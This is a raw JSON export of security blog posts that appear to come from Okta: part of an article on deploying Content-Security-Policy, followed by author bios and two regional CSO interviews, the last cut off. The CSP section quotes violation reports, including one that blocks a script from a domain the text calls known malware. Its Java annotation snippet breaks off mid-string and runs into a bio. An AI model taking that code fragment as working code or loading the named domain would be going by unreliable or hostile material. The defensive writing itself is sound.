intercept:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \\\"csp-report\\\": {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \\\"effective-directive\\\": \\\"connect-src\\\",\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \\\"original-policy\\\": \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"[truncated]\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \\\"blocked-uri\\\": \\\"https://mail.google.com/mail/feed/atom/\\\",\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \\\"source-file\\\": \\\"user-script\\\",\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \\\"line-number\\\": 5,\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \\\"column-number\\\": 16842\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" }\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"}\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sample violation: Where Content-Security-Policy (CSP) intercepted: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Content-Security-Policy securely blocks known malicious scripts such as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://hackerdose.com/malware/scriptcdn-net-malware/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"this one\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that was reported to us by report-uri. The example below illustrates a truncated excerpt CSP interception, adding to the environment’s security assurance posture:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \\\"csp-report\\\": {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \\\"effective-directive\\\": \\\"script-src-elem\\\",\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \\\"Original-policy\\\":\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" [truncated]\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \\\"blocked-uri\\\": \\\"https://3001.scriptcdn.net/code/static/1\\\",\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \\\"line-number\\\": 7,\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \\\"column-number\\\": 47,\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \\\"status-code\\\": 200\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" }\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"}\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Internal forward requests\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A request may go through the interceptor chain several times when forwarded internally. This can create complications if CSP headers are computed each time, especially if the computed header changes or is removed, since it cannot be unset once set. Complications arise when a page that is customizable by administrators is forwarded to a page that is not customizable or the other way around, as each page requires a different CSP. In our use case, we rolled out a base policy containing frame-ancestors which was used as a way to revert an incorrectly-computed policy due to forwards.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Testing\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In order to set a specific policy for a specific customer to perform thorough live testing and debugging, we leverage \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.baeldung.com/java-management-extensions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Java Management Extensions\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (JMX) because it gives us the ability to modify the CSP policy live in the application while on a discovery call with customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Selenium tests are considered to be of great importance - without these tests, something is likely to break in production when one least expects it. We built a framework that allows us to fail a selenium test if a CSP error was present in the browser console of a selenium test.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Customized content\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s admin console user interface (UI) allows the admin to customize the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/settings/customizations-configure-csp.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Content-Security-Policy\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (CSP) for customizable pages. This encourages the creation of CSP that allows their customizations to execute and toggle that policy between Content-Security-Policy-Report-Only and Content-Security-Policy. Also, they have the option to provide their own reporting URL for browser-based violation reports.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Directives\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Navigational directives such as “\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"frame-ancestors\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"” should always be added to prevent a malicious actor from attempting to iFrame not only html content, but also APIs. We recommend fetch directives only for endpoints that return html content, considering the downside of non-html content causing an increase in network traffic due to larger header size in the response.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Header size limitations\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"API gateways such as AWS API, Google Cloud Apigee API and Kong API Gateway all have limitations on the response header size ranging from 4KB to 128KB. With the introduction of nonces to tackle unsafe-inline, the response header size can surpass 4KB. Special consideration must be taken with customers using API gateways to allow for a higher response size.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Rollout Challenges\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In an effort to share our lessons learned, the following subsections capture rollout challenges encountered throughout each of the three above-listed configuration methods:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Unsafe-eval\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tackling unsafe-eval is the first step in putting a stop to new code that is not templated. The next step is to track each existing violation and to remove all the exemptions from the linting allow-list. The last step is to remove the unsafe-eval keyword from the policy.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Unsafe-inline\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Expect a significant impact if unsafe-inline is removed from the policy. One key risk in the removal is a high probability of user impact if the policy is incorrect. Impacts could include blocking an inline-script or inline-style on a page which creates a bad user experience (UX) or even cause a page not to load properly. For third-party integrations that require unsafe-inline for inline-script or inline-style, it’s best to request the vendor to fix their code to not require unsafe-inline, otherwise, you’re stuck with inherited poor practices. If an integration is required such as Pendo or Mapbox, it may take time for the vendor to implement a fix which removes the unsafe-inline/unsafe-eval requirement.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The approach we preferred was to empower each team to rollout their endpoints by using annotations which control whether adding a nonce to script-src and style-src for both Content-Security-Policy-Report-Only and Content-Security-Policy. The following CSP example can be untimely but assures a lower risk in testing independently:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"@RequestMapping(value = “/api/v1/object, method = RequestMethod.GET)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"@ScriptSrcNonce(policy = {ScriptSrcNoncePolicy.SCRIPT_SRC_NONCE_REPORT_ONLY, ScriptSrcNoncePolicy.SCRIPT_SRC_NONCE_ENFORCED}, switchProperty = \\\"team.Mihai Iacob is a Software Engineer on the Engineering Security team at Okta. His extensive background in cybersecurity includes secure software development, encryption and key management, audit, authorization model, web security, and content security policy. He contributes to the development and implementation of robust security measures that safeguard our users’ data and privacy. Mihai’s interests include participating in Okta’s internal bug bounty program and hackathons.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5eXScMSnppzUzRz81kzfvr/53ca739875b6b09e70613b52abb483f3/IMG_-nw9dov.jpg"},"name":"Mihai Iacob","jobTitle":"Software Engineer","slug":"/hackers/mihai-iacob","node_locale":"en"},{"id":"f62bb825-00bd-5b3f-8231-5c52be7327cc","bio":{"bio":"Bryan Honan is the Manager, Customer Assurance, EMEA region at Okta. The Customer Assurance team working in Security Trust & Culture is responsible for providing support to Okta’s growing customer base on inquiries pertaining to Security and Compliance. Backed by CISSP and CCSK, he leverages 10+ years of IT and Security experience. Having worked for companies in several different industries, he is able to advise Okta’s customers from both a technical and business perspective. In his downtime, he enjoys traveling around Europe.
"},"image":{"url":"https://downloads.ctfassets.net/kbkgmx9upatd/3GRebaQAYbzK6Ov5wXvWfN/c1d62a925b98b09b09e00242c8e5f3af/IMG_5201_2.jpg"},"name":"Bryan Honan","jobTitle":"Manager, Customer Assurance EMEA","slug":"/hackers/bryan-honan","node_locale":"en"},{"id":"ea48a12c-95dd-5fbd-acfc-7e87829aef98","bio":{"bio":"Arun is a Senior Manager, Engineering Security at Okta. As a founding member of this team, he’s familiar with driving security strategy and execution across the company’s engineering organization. With 15+ years of experience, Arun specializes in security architecture, secure software development, risk management, and security operations. He holds CISSP, CEH, and an Advanced Cloud Security Practitioner credential, with expertise in web security, cloud infra security, cryptography, and secure identity frameworks. Arun has successfully led large-scale, cross-functional security initiatives, integrating security seamlessly into agile development and is passionate about building scalable security frameworks and empowering teams to achieve security excellence. Outside of work, Arun enjoys flight simulation and refining his virtual piloting skills, driven by his passion for the skies.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/33cawOQQoY7WXgyS1f4emK/0e8108436d3fee48a46e4f640377c7cc/Image_from_iOS.jpg"},"name":"Arun Kumar Elengovan","jobTitle":"Sr. Software Development Manager, Engineering Security","slug":"/hackers/arun-kumar-elengovan","node_locale":"en"}]},{"slug":"/articles/2025/02/cso-conversations-stephen-mcdermid","id":"51448245-0864-5dad-a3e1-612f9b546fa1","title":"CSO Conversations: Stephen McDermid, Regional CSO of EMEA","date":"2025-02-26T11:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\"CSO Conversations is a blog series interviewing Okta’s Regional CSOs supporting David Bradbury, Okta’s Chief Security Officer in providing the best service for our customers. Okta’s Regional CSOs are integral to Okta’s Security Trust and Culture team, building and strengthening trusted advisor relationships with global security thought leadership.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"What motivated your career pursuit in cybersecurity?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"While working as Head of IT, the business needed to achieve ISO27001 in order to meet our government contractual requirements. It was an area I had always had an interest in, and so we brought in some external consultants to help us achieve the certification, but also to educate us on the ISO approach. After we delivered ISO27001, I was then asked to deliver PCI-DSS for our much larger Tier-1 parent company who had acquired us the previous year, and so this brought a whole new dimension to understanding our application, infrastructure and security challenges. As part of agreeing to do this and successfully delivering the certification, I asked the business to offer me the recently-vacant Information Security opportunity and this led to my first Information Security role!\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Are there any emerging trends or technologies that have you particularly interested?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"It’s impossible to avoid the rise of AI and specifically, AI Agents. By the end of 2025, we’ll be living in a world with billions of autonomous AI Agents acting on our behalf. There are important questions that the cybersecurity industry needs to answer - what are these bots doing? What information do they have access to? And, how do we set and control the conditions and parameters around what information they can share, with who, and under what circumstances?\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"What’s interesting is that right now, all these questions are up in the air. These bots don’t have the benefit of basic cybersecurity awareness training. They don’t have that human sixth sense that tells us something just might not be right. They can’t think for themselves. All it takes is one rogue prompt for an AI Agent to mistakenly share sensitive, personal or financial information with another agent, and things could quickly escalate. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"How has your previous experience in cloud computing shaped your approach to cybersecurity today?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Having a background in on-prem and cloud technologies definitely helps when it comes to cybersecurity. Threats span across technology stacks and so understanding how these threats can affect different elements is key. However, understanding the protections and benefits that cloud computing can bring is just as important and so being able to help our customers understand both sides is pivotal to my role.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"What are your thoughts on traditional passwords in today’s technology landscape, given modernized threats?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"I think I’m aligned with most when I say the sooner we can get rid of them, the better. I don’t think it’s the catch-all, but certainly when we see over 80% of breaches coming from compromised passwords, it’s time for change! I think they will always be needed in some areas of technology, but the governance and visibility has advanced massively over recent years and so we need to ensure tighter controls around them. Not just the typical complexity and policies, but where they are used from, when they are used, during use and even after use, we can apply a lot more governance!\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"What trends are you seeing in cybersecurity relating to your region?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"It’s hard to see beyond the buzz of AI and all that it brings, but with the heavy regulation we have in the European Union, we have a number of new regulations such as the EU AI Act that adds additional levels of protection and complexity. Everyone has a lot of questions of how they can be compliant and how suppliers and partners can help. We’re seeing a growing trend of compliance automation and engineering to navigate these challenges and the more we can simplify the regulations and evidence compliance, the better.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"In \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.computerweekly.com/news/366617120/The-Security-Interviews-Stephen-McDermid-Okta\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"value\":\"your recent interview\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\", you referred to the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"value\":\"Secure Identity Commitment\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" and Okta’s transparency. How important is it to be transparent in your role as Regional CSO?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Transparency is a critical pillar of our cybersecurity strategy and how we work with our customers. Even though we have people who are incredible security experts at Okta, ultimately, security is a people business. It’s hearts and minds, and our focus on being transparent, especially in times of crisis, is a key differentiator here.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"To ensure Okta has a strong security culture, we’ve spent a lot of time explaining the why behind the changes we are making, how it will affect our teams, and importantly, how it will benefit our customers. Ensuring everyone is on the same page internally is vital to ensuring we deliver consistent messaging and communications to customers. In the many hundreds of conversations I’ve had with customers, they’ve recognized, appreciated and thanked us for our openness and collaboration.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"If you could provide a few short cybersecurity words of wisdom to Okta customers, what would they be?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Identity is part of every project, from application modernisations, to infrastructure migration, to business operations and staff training! It’s important to understand how identities in these projects tie into your strategic goals, and more importantly, how you are applying governance, control and visibility of what’s happening across them. It’s in these dark corners of IT transformation that dangers lie and shining a light on them thoroughly and regularly ensures confidence against identity attacks.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"What are some healthy cybersecurity habits you’ve gotten your friends and/or family to adopt?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The idea that every website needs to know your date of birth, your address or even your real name has always been alien to me. Using aliases, fake dates of birth and addresses across the multiple website registrations of today's world has always been something I’ve recommended. Obviously, applications like banking or governmental sites being the exception, but that website that you sign up to for a newsletter doesn’t need the real data! So my advice has always been to consider what you're sharing and with who, especially in today's world now where so many applications or websites are free, which means the cost to use their service is your personal data.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"What do you think may be some key changes the cybersecurity industry sees this coming year?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We need a mindset shift across the cybersecurity industry with far more collaboration between industry players. We face an unprecedented threat environment, and this is before the potential risks that AI Agents bring to the table.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We need to agree to more standards, best practices, and frameworks around cloud applications and how they communicate with each other so that they are secure by default. A single cybersecurity vendor cannot achieve this alone. We’ve already started on this by working with others in the Interoperability Profiling for Secure Identity in the Enterprise (IPSIE) working group in the OpenID Foundation to help standardize secure identity management across SaaS solutions and vendors.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Stephen McDermid was recently interviewed by \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.computerweekly.com/news/366617120/The-Security-Interviews-Stephen-McDermid-Okta\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Computer Weekly\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" on how Okta is championing a secure-by-design approach, emphasizing the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta Secure Identity Commitment (OSIC)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" and the importance of building a strong security culture. Stephen was also featured by \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.itpro.com/business/policy-and-legislation/a-csos-perspective-on-dora-compliance-and-where-to-go-from-here\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"ITPro\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", capturing a CSO’s perspective on DORA compliance.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"},"summary":{"summary":"CSO Conversations is a blog series interviewing Okta’s Regional CSOs supporting David Bradbury, Okta’s Chief Security Officer in providing the best service for our customers. Okta’s Regional CSOs are integral to Okta’s Security Trust and Culture team, building and strengthening trusted advisor relationships with global security thought leadership."},"updatedAt":"2025-02-26T17:32:04.538Z","secAuthor":[{"id":"4bd66bb8-bbb2-5ab6-895d-32c670d02166","bio":{"bio":"
Stephen McDermid, CSO EMEA has led and been responsible for several enterprise-wide transformations ranging from National Government transformation projects to ISO27001 and PCI-DSS accreditation across multiple sites. He's taken his hands-on knowledge and expertise and used them to help organizations manage security across a broad range of disciplines and ensure senior stakeholders understand the risks and, more importantly, the opportunities available to their business. Stephen has worked with some of the largest organizations across military, banking, government, and enterprise sectors, to enable business transformation and growth. Stephen spends a lot of time on or near water, not just because of the rain; he holds a powerboat license and loves exploring the West Coast waters of Scotland.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/3dK8xXUsNpD0udBFZ9FyRL/c7b20c4103a0b02e73c8167676403f89/Stephen-McDermid.png"},"name":"Stephen McDermid","jobTitle":"Regional CSO, EMEA","slug":"stephen-mcdermid","node_locale":"en"}]},{"slug":"/articles/2025/02/cso-conversations-keiko-itakura","id":"ca620f89-1a45-5734-9691-5eee2411ddc9","title":"CSO Conversations: Keiko Itakura, Regional CSO of Japan","date":"2025-02-12T11:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"CSO Conversations is a blog series interviewing Okta’s Regional CSOs supporting David Bradbury, Okta’s Chief Security Officer in providing the best service for our customers. Okta’s Regional CSOs are integral to Okta’s Security Trust and Culture team, building and strengthening trusted advisor relationships with global security thought leadership.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What motivated your career pursuit in cybersecurity at Okta?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Logging in is the first step in a threat scenario, and identity represents the person themselves. In one survey, it was found that over 80% of security incidents were related to identity credentials. Okta is used by many customers in Japan, and the greatest reward of pursuing a career at Okta is that by securing Okta, we contribute to protecting the businesses of our many customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How has your previous experience shaped your approach to cybersecurity today?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I have worked in the identity security field in a variety of positions, not only as a product vendor, but also as a security officer at a user company, as a consultant at a partner company, and as an engineer at a system integrator. Attackers may attempt to exploit gaps in normal processes, such as emergency recovery processes or exception processes for executives. My real-world experience in a variety of roles has helped me to think realistically about which business processes are vulnerable and what countermeasures can be taken.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Are there any existing or emerging threats of particular interest to you?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I continue to be concerned about phishing attacks. As I mentioned earlier, there are many incidents related to credentials, and phishing using email and SMS is still being used as a way to steal credentials. And, with the development of AI technology, it is becoming more difficult for humans to detect. In addition to system-based measures such as passwordless authentication and DMARC, it is necessary to take a wide range of measures, including user education and reviewing business processes.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Recently, I have also been paying more attention to cyber attacks resulting from geopolitical risks, such as the MirrorFace cyber attack. This year, the Osaka-Kansai Japan Expo 2025 will be held, and such international events increase the risk of being targeted by cyber attacks, so I am also vigilant about threats related to this.\\n\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From your perspective, what is the impact of cybersecurity awareness in today’s organizations?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"No matter how much you invest in system protection, if the security culture is weak, there will be risk. Of course education and training are important, but it is also important to have a system for evaluating security awareness. In addition, security is often neglected because of concerns that it could put the brakes on business speed. It is necessary for the management team to themselves place importance on security and to propagate it as a corporate culture.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As the methods used in phishing and social engineering become more and more sophisticated, it will also be important to create a relationship where people feel psychologically safe to report any suspicions they may have.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What are your thoughts on automated intelligence, or AI, in cybersecurity?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The democratization of AI technology has lowered the cost of carrying out attacks. It is becoming increasingly difficult to visually determine whether something is fake, such as advanced deep fakes. I believe that defenders also need to use AI technology to create a system that can automatically and timely detect and repair attacks while implementing multilayered defence.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What trends are you seeing in cybersecurity relating to your region?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Japan has a distinctive organizational structure, way of working and underlying way of thinking, and this gives rise to issues and responses that are specific to Japan.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For example, Japan's traditional employment system is known as the ‘membership type’, and rather than honing specific expertise, employees are expected to take on a variety of tasks based on the premise of lifetime employment. In other words, they are committed to the company itself. For this reason, in many cases, security expertise is heavily dependent on external resources such as SIers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"However, in light of the growing importance of security in recent years, there has been an increase in the number of cases where companies are hiring external security experts as full-time employees. As a result of global business expansion and management integration, many companies are now faced with the common challenge of determining what organizational structure and mechanisms they should use to ensure security across the entire supply chain and implement governance 